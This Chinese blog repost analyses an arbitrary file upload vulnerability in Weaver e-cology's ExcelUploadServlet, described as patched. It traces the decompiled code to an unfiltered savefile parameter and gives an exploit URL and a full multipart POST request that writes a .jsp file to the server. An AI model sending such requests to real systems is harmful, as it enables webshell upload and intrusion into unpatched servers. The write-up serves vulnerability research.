泛微e-cology另一接口任意文件上传(已修复)

admin 2021年4月15日10:21:30评论20 views字数 1437阅读4分47秒阅读模式

    这两天在看coremail,寻找传说中的RCE。发现没啥更新的了,于是把泛微拎出来在打一顿。

       问题和我上一篇文章差不多,只是接口不同罢了。也是被之前的补丁给patch了。

老规矩,先给出定位文件

ecology/CLASSB~1/weaver/workflow/exceldesign/ExcelUploadServlet.class

泛微e-cology另一接口任意文件上传(已修复)

    朋友建议我尽量写的浅显易懂一点,我就解释下每行代码的意思吧,当然大佬可以一笔带过,授人以鱼不如授人以渔。

一般看Servlet我们都先看doGet方法,Servlet一般都需要重写doGet方法,因为父类的HttpServlet的doGet方法是空的,没有实现任何代码,子类需要重写此方法。可以看到这里doGet下面通过this调用doPost方法,然后

doPost方法对传入参数method进行判断,如果等于uploadFile就进入imageupload函数

泛微e-cology另一接口任意文件上传(已修复)

在imageupload函数中可以看到,var15=var4+var3。var4是固定路径,var3我们又可控,在创建文件路径对象时又没有过滤savefile参数,导致任意文件创建。

泛微e-cology另一接口任意文件上传(已修复)

 

所以上传后的路径就是:

filesystem/exceldesign/uploadimg/savefile参数

那么exp为:

http://192.168.217.143/weaver/weaver.workflow.exceldesign.ExcelUploadServlet?method=uploadFile&savefile=pass.jsp

 

POST /weaver/weaver.workflow.exceldesign.ExcelUploadServlet?method=uploadFile&savefile=pass.jsp HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=testUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=--------1638451160Content-Length: 171
----------1638451160Content-Disposition: form-data; name="filename"Content-Type: image/jpeg
helloword----------1638451160--

 

PS:该漏洞已修复,遇到即是有缘。

原文始发于微信公众号(攻队):泛微e-cology另一接口任意文件上传(已修复)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月15日10:21:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微e-cology另一接口任意文件上传(已修复)https://cn-sec.com/archives/1946868.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息